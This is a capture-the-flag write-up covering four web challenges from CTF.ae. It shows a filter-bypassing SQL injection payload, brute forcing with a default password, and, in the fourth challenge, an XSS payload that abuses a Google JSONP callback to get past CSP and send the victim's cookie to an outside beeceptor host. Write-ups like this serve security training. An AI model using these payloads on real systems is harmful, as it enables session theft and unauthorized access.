CAT CTF.ae-Write-up
Hi , My name is Ahmed Magdy :)
I would like to thank all the organizers for this CTF
and my new team
Let’s go solving the web challenge…
1 - Challenge Name : Admin Panel
When i check the sourse code i find the user and pass = Guest_101 there in a HTML comment
After a long time add the cookie, I couldn’t find anything :(
i will try SQL injection if anything happens
when i will try SQL injection it is alert (Forbidden)
It is filter to any payload Includes (or)
I try some payload and it is payload is work >> Guest_101'/*//*/’1'=’
user and password >> Guest_101'/*//*/’1'=’
Flag : CTFAE{SQLi_1s_C00l_Vulnerability_Th0ugh_Sp3cially_1n_CTFAE}
2 - Challenge Name : Greeting Generator
I found three input filed and i try command injection but the command was print. let’s try Server Side Template Injection
The template engine is probably Jinja2, but you have to face some restrictions.
When i find what happen i remember the writ-up >> Abdalla Tarek
but different flag
Flag : CTFAE{HelloThereGeneralKenobi}
3 - Challenge Name : Sorry Wilson
I will try in user and password= admin or any thing i find
When i check the sourse code i find the HTML comment
after dirb i find the >> ( generated_users.txt ) and ( .DS_Store ) and (README.md)
open generated_users.txt i find the all user for ( team forest ) and i try brute force in user and i have default password = P@ssw0rd!
I check in case i find the cookies
I find this cookies
once logged in brute force the uid=cookies from same file
Flag : CTFAE{D0_nOt_Cr347E_CLE4r_M3sSag3}
4 - Challenge Name : Support Ticket 2.0
I will try xss payload
CSP (Content Security Policy) is an HTTP header that a web application can send to inform the browser what are the trusted sources to load and execute java script from. Let’s examine the CSP policy sent by the server
We can use an online tool by google called CSP Evaluator and paste the CSP policy into it to check for any vulnerabilities.
For more on bypassing CSP using angular, read this blog here.
the trusted sources to load and execute java script from i used >>
”><script src=”https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>
It works! So now let’s craft a payload to exfiltrate the cookie and see if there’s anything interesting. I will be using a payload that sends the cookie HTTP request to a URL: https://Ahmed.free.beeceptor.com
<script src=”//accounts.google.com/o/oauth2/revoke?callback=eval(document.location=’https://Ahmed.free.beeceptor.com'.concat(document.cookie))"></script>
cookie=session=s%3A6PZYod9n7ENwZ7iDudPtgBkEd6MJstV8.WyFSMUj13Kf6j3Fnk8mIk1MN%2FLhaElmE%2FN16Q%2FPJhH4
the cookie changed whit all request
and his referer >> http://web.ctf.ae:8812/support_ticket/f1400c65-ea9f-48db-9394-0fda02b690db?displayFlag=false
when use the referer :(
so use the referer and cookies for admin and add parameter displayFlag=false to displayFlag=true
Flag : CTFAE{JSONAreTheBestTypeOfBees}
End the web challenge…… I solve it :)
I would like to thank my new team for help my to solve challenges
Think you for your time :)
I would like to thank all the organizers for this CTF again:)
And finally, Thank you to read this write-up :)
Contact me if you want : Ahmed Magdy :)